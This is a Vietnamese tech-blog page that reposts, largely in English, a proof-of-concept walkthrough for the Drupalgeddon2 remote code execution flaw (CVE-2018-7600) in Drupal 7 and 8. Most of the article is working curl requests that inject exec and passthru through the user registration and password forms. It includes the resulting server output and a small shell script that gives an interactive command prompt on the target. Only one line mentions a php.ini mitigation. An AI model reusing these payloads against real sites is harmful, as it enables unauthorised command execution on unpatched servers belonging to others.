Drupalgeddon - Thử injection Drupal 7 tại form tạo tài khoản và cái kết

Drupalgeddon

Hướng dẫn sử dụng Redux để quản lý hiệu quả trong ứng dụng React

Average: 6.5 (4 votes)

Cài đặt Webpack để viết Reactjs bằng ES6 và những thuận lợi của ES6

Average: 9.5 (2 votes)

Drupalgeddon - Thử injection Drupal 7 tại form tạo tài khoản và cái kết

CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)

Các bạn nên disable_funtion trên php.ini trách các lỗi bảo mật như phía dưới

disable_funtion = exec, mail ...

PoC #1 - #post_render / account/mail / exec

It uses the user/register URL, #post_render parameter, targeting account/mail, using PHP's exec function.

curl -k -i 'http://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'

The server will give 200 response & display JSON. It IS able to render the output in the response (such as doing uname -a).

Example

[g0tmi1k@attacker]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
 --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 15:56:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 280
Content-Type: application/json

[{"command":"insert","method":"replaceWith","selector":null,"data":"Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
[g0tmi1k@attacker]$

PoC #2 - #lazy_builder / timezone/timezone / exec

It uses the user/register URL, #lazy_builder parameter, targeting timezone/timezone, using PHP's exec function.

curl -k -i 'http://localhost/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'

The server will give 500 response & display "The website encountered an unexpected error. Please try again later". It is NOT able to render the output in the response (Blind!).

Example

[g0tmi1k@attacker]$ curl -k -i 'http://localhost/drupal-8.4.5/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
HTTP/1.0 500 500 Service unavailable (with message)
Date: Wed, 18 Apr 2018 15:58:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Cache-Control: no-cache, private
Content-Length: 74
Connection: close
Content-Type: text/html

The website encountered an unexpected error. Please try again later.<br />
[g0tmi1k@attacker]$
root@ubuntu140045x64-drupal:~# stat /tmp/2
 File: '/tmp/2'
 Size: 0     	Blocks: 0     IO Block: 4096  regular empty file
Device: fd01h/64769d	Inode: 59488    Links: 1
Access: (0644/-rw-r--r--) Uid: (  33/www-data)  Gid: (  33/www-data)
Access: 2018-04-18 15:58:05.061898957 +0000
Modify: 2018-04-18 15:58:05.061898957 +0000
Change: 2018-04-18 15:58:05.061898957 +0000
 Birth: -
root@ubuntu140045x64-drupal:~#

Drupal v7.x

Tested on Drupal v7.55 / v7.57

This is a different when compared to v8.x, as you need to make two requests in order to exploit

PoC #3 - #post_render / user/password / passthru

It uses #post_render & name parameters, targeting user/password request, using PHP's passthru function.

We need to get the value from form_build_id:

curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
  --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id

NOTE: This time you need to URL encode (e.g. Spaces ~ -> +)_

Afterwards, make a new request, using the value from above as such:

curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}"

Example

[g0tmi1k@attacker]$ curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
  --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id
<input type="hidden" name="form_build_id" value="form-r55m87T9afnEo-eEePGipGpHTkjPFBgUCnytk_Zuc4I" />
[g0tmi1k@attacker]$
[g0tmi1k@attacker]$ form_build_id=form-r55m87T9afnEo-eEePGipGpHTkjPFBgUCnytk_Zuc4I
[g0tmi1k@attacker]$
[g0tmi1k@attacker]$ curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}"
HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 16:26:15 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
X-Drupal-Ajax-Token: 1
Set-Cookie: SESS8233de9b9c6a45efe3fd08080d4d6479=w51ZcYf67YNjEpVr0g5Smzzjx_vmSURbNdXHl4fKUj4; expires=Fri, 11-May-2018 19:59:35 GMT; Max-Age=2000000; path=/; HttpOnly
Content-Length: 537
Connection: close
Content-Type: application/json; charset=utf-8

Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[{"command":"settings","settings":{"basePath":"\/drupal-7.55\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"_YUWCY69tMlrR-TCiD_jZ-NazJKUHeTo1Om8T4EJ_YQ"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/drupal-7.55\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"_YUWCY69tMlrR-TCiD_jZ-NazJKUHeTo1Om8T4EJ_YQ"}}}]
[g0tmi1k@attacker]$

Bash Fu/Automation

We can automate this a little more by using sed to exact the value, as shown below:

form_build_id=$( curl -k -s 'http://localhost/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
  --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | sed -E 's/.*name="form_build_id" value="(.*)".*/\1/' )

curl -k -i "http://localhost/drupal-7.55/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}"

Bash Scripting

We can make a very basic exploit (for Drupal v8) as show:

[g0tmi1k@attacker]$ cat exploit.sh
#!/bin/sh

# Forever loop
while True; do
 # Get input
 read -p 'drupalgeddon2>>: ' command

 # Make request
 curl -k 'http://localhost/drupal-8.4.5/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=${command}"

 # New line (the response doesn't have one)
 echo
done
[g0tmi1k@attacker]$
[g0tmi1k@attacker]$ sh exploit.sh
drupalgeddon2>>: id
[{"command":"insert","method":"replaceWith","selector":null,"data":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
drupalgeddon2>>: uname -a
[{"command":"insert","method":"replaceWith","selector":null,"data":"Linux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
drupalgeddon2>>: ^C
[g0tmi1k@attacker]$
Bạn thấy bài viết này như thế nào?: 
Average: 5 (3 votes)

Bình luận (1)

Ảnh của admin
admin- Mar 25, 2020 07:11 PM Reply

Quá đỉnh

 

Add Comment

Plain text

 • No HTML tags allowed.
 • Các địa chỉ web và email sẽ tự động được chuyển sang dạng liên kết.
 • Tự động ngắt dòng và đoạn văn.
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.
9 + 2 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.

Advertisement

 

jobsora

Dich vu khu trung tphcm

Dich vu diet chuot tphcm

Dich vu diet con trung

Quảng Cáo Bài Viết

 
Samsung Smart TV: giới thiệu tại CES 2013
Samsung Smart TV: giới thiệu tại CES 2013

Samsung hứa hẹn sẽ khởi động Smart Hub với cái nhìn hoàn toàn mới cho Smart TV của mình sau khi đăng ảnh trêu ghẹo các hãng khác trên trang Flickr của mình.

[Joomla, Wordpress, Drupal] Multisites là 1 ý kiến tồi cho Many Sites
[Joomla, Wordpress, Drupal] Multisites là 1 ý kiến tồi cho Many Sites

As open source becomes more and more popular, we see organizations rolling out many sites across their organization. As they try to manage them, many of them turn to "multis

Một số khái niệm cơ bản cần biết về Search Engine Optimization - SEO (phần 2)
Một số khái niệm cơ bản cần biết về Search Engine Optimization - SEO (phần 2)

Search Engine Optimization, hay thường gọi là tối ưu hóa bộ máy tìm kiếm có lẽ không mấy xa lạ với nhiều người sử dụng chúng ta. Nhưng việc hiểu rõ về bản chất cũng như tận dụng được ưu điểm của SEO ...